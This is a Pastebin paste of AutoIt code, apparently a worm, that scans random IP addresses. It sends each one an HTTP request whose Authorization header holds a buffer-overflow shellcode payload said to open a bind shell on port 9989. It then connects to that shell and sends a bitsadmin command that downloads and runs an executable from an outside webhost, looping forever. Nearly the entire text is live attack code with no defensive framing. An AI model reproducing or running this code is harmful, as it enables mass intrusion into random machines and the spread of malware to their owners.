Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ;shellcode runs bind tcp shell on port 9989
- ;scanner exploits oracle port 80 (via 0day bof)
- ;scanner connects and sends download and execute command.
- Func ExploitRandomPC()
- TCPStartup()
- HotKeySet("{Esc}", "_Close")
- $ip = Random(1,255)&"."&Random(1,255)&"."&Random(1,255)&"."&Random(1,255)
- $socket = TCPConnect($ip, 80)
- If @error Then
- TCPShutdown()
- EndIf
- $data = "GET / HTTP/1.1\r\nHost: "&$ip&"\r\nAuthorization: Basic QUFBQTpCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC62SQkEZtYWCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkOsQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkIHE/+///0S6ZNuT59rW2XQk9FgpybFTMVASg8AEAzTVcRJIAffdsNKYVFXjmAMeVClHclnCBWbqpoGJWwz0pFw9xKfePBkH3o5sRifynRrweDOKdTSIIcXYiNae27lJlIUZaHm+E3Ke++oJVHft26R4QiIJi5pjrnTpncwJ6lqu1X94CJ3YpKhyvi+mP7R3q74ZDNdLnMJRD7vGOsuiX+e6279IYn60ZXfzl+G0Pify0klUwH3i8mj1LAWOLIiZcc/psLWbuaocpFEqoHHPIgcq8s/3mrJ/kPA8oID6lskpBxnSrI7/dr/GqO59PWGJfhfZPTZx3kLHV0jUTLRMxVKR5JLFb2XRdG+sgRXiK1FTH+QGNNH9wqhIVPAwDJ+w7u0eOWJJBSm6UgEdEgXfy9T/kaWOrHshVp+7N1fKTdfmowvoxyOckTXUY0j+9IFYC50fCbbAn+T1/CMMhvo8ZYNH+5b52G6Yrtm6kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJA=\r\n\r\n"
- TCPSend($socket, $data)
- TCPShutdown()
- TCPStartup()
- $socket = TCPConnect($ip, 9989)
- TCPSend($socket, "bitsadmin /transfer myjob /download /priority high http://rangier-match.000webhostapp.com/log.exe %TEMP%\log.exe&start %TEMP%\log.exe\r\n")
- TCPShutdown()
- EndFunc
- While 1 = 1
- ExploitRandomPC()
- WEnd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement